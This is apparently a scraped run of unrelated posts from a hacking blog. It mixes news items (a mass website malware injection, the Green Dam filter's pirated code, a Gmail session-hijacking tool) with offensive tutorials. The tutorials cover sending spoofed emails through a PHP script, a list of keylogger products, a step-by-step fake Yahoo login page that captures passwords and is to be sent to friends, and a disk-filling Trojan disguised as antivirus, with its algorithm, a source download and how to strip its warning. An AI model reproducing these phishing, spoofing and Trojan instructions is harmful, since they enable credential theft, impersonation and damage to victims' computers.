This looks like a fairly complex infection mechanism combining exploiting websites, injecting JavaScript code then attempted exploitation of host machines and failing that prompting a download for some fake malware.
The way they have it all setup is pretty clever too hiding behind common technologies so their infections don’t look out of place.
An obfuscated JavaScript meant to look like Google Analytics code? That’s smart.
A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.
The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot.
The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor’s machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software.
If you imagine 30,000 websites have been installed, how much traffic do these sites have in total? And out of that how many client computers have been infected.
The numbers could be quite huge.
The rogue anti-virus seems fairly intelligently designed too with polymorphic techniques to avoid signature scanning by real AV engines.
The rogue anti-virus software uses polymorphic techniques to constantly alter its digital signature, allowing it to evade detection by the vast majority of legitimate anti-virus programs. Because it uses obfuscation, the javascript is also hard to detect by antivirus programs and impossible to spot using Google searches that scour the web for a common string or variable.
“For the common user, it’s going to be possible but difficult to determine what the code is doing or if it’s indeed malicious,” Chenette told The Register. “We can see this quickly growing.”
The infection shares many similarities with a mass website malady that’s been dubbed Gumblar. It too injects obfuscated javascript into legitimate websites in an attempt to attack visitors. So far, it’s spread to about 60,000 sites, Websense estimates.
Several differences in the way the javascript behaves, however, have led Websense researchers to believe the two attacks are unrelated. The researchers have also noticed that the code, once it’s deobfuscated, points to web addresses that are misspellings of legitimate Google Analytics domains that many sites use to track visitor statistics. The RBN, or Russian Business Network, has used similar tactics in the past, and Websense is now working to determine whether those responsible for this latest attack have ties to that criminal outfit.
Seems like it could possibly be from Russia (the RBN) and it’s not related to Gumblar, even though they have quite a few similarities.
Interesting case to watch, and make sure any sites you run are up to date, secured and not open to SQL injection!
Source: The Register
Massive Malware Outbreak Infects 30,000 Websites
China's Mandated Site-Blocking Software is Pirated code
ccording to Solid Oak Software, the makers of CyberSitter, one of the more popular Internet-filtering programs, not only does Green Dam look similar to CyberSitter, it uses DLLs identified with CyberSitter, and even gets updates from Solid Oak's servers.
Piracy? A Chinese company stealing intellectual property
![[Image]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tXu-VQLmTjiP_BRZtQdP6YWemuMS-vddT5NTLIy4Ktpfq7CIr4i3D_KwUDaJTN3Mh41R9PWVV4yVJeOas4vjgLqTXEo4Usss8MbGyRCMT0wvszHSE7h3HQ2FscJoJ-n0MY0vEFz1ZClJExZQ=s0-d)
CYBERsitter - Solid Oak Software
![[Image]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWnmM2R1kz7UfxlDOgxgByMvAhfREOXawRbp5r5CaiqhUqT72H_BaXEXcAG1k7b912--w642QY7InIsXb6UNpuYwinK7fT5mph5rHpVhvxC0-4LdfLTlNHbr4f=s0-d)
Green Dam - Software
Seriously, not only does the software use pirated code, a University of Michigan study shows that the software contains security vulnerabilities.
The good thing is, the software needn't be installed on PCs bought in China; the OEM merely has to provide a CD with the installable image. Additionally, the software is uninstallable, although the University of Michigan study notes that it leaves the log files behind, so even after uninstalling, historical user activity can be ascertained.
An interesting conundrum, however. Since the Green Dam program contains CyberSitter code, any OEM providing the code on or with their computers would be facilitating piracy. Of course, if they don't do so, they won't be able to sell to China. Ooof.
via
How to Send Anonymous Emails
The art of sending this kind emails is known as Email Spoofing.This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.
What is a Relay Server?
In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.
So What’s Next?
Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.
Anonymous Email Sender Script
Here is a step-by-step procedure to setup your own Anonymous Email Sender Script
1. Goto X10 Hosting and register a new account.
2. Download my Anonymous Email Sender Script (sendmail.rar).
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL
http://yoursite.x10hosting.com/sendmail.php
NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
7. Use the script to send Anonymous Emails. Enjoy!!!
Tell me whether it worked or not. Please pass your comments…
WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.
Gmail Hacking Tool – A New Way to Hack Gmail
A new Gmail hacking tool that is capable of automatically stealing the Gmail IDs of non-encrypted sessions and breaking into Gmail accounts has been presented at the Defcon hackers’ conference in Las Vegas.
Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed this Gmail hacking tool is planning to release the tool in two weeks.
When you log in to Gmail account the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually click the sign out button. When you click sign out this cookie is cleared.Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done.
According to Google this behavior was chosen because of low-bandwidth users, as SLL connections requires high bandwidth.The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for a hacker to sniff the traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. The new Gmail hacking tool is capable of doing this. Once this happens the hacker can log into the account without the need of a password. People checking their e-mail from public wireless hotspots are more likely to get hacked than the ones using secure wired networks.
Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.
“If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.
Common Email Hacking Methods
Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.
Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.
A keylogger program is widely available on the internet.some of them are listed below
Win-Spy Monitor
Realtime Spy
SpyAgent Stealth
Spy Anywhere
For more information on keyloggers and it’s usage refer my post Hacking an email account.
Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).
Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.
How to Create a Fake Login Page
In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.
Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.
Due to a large number of requests from my visitors, I have elaborated some of the steps in this post. I have made best effort to explain every point in detail.
Here is a step-by-step procedure to create a fake login page.
STEP 1.
Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
STEP 2.
Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As
Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .
STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML
STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.
For example you may find something like this in the opened HTML file
src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”
Rename the above link into
src=”files/ma_mail_1.gif”
Repeat the same procedure for every file contained in the folder by name “files“.
Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
action=
you will see something like this
action=https://login.yahoo.com/config/login?
Edit this to
action=http://yoursite.com/login.php
Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
yoursite.com Root folder
NOTE: Make sure that your host supports PHP
Tip: 110mb.com supports PHP
STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password
NOTE: The concept here is to save the password.The format is not important here.
STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
How to Make a Trojan Horse
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll”
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan along with it’s source code HERE.
How to compile, test and remove the damage?
Compilation:You can use Borland C++ compiler (or equivalent) to compile the Trojan.
Testing:
To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
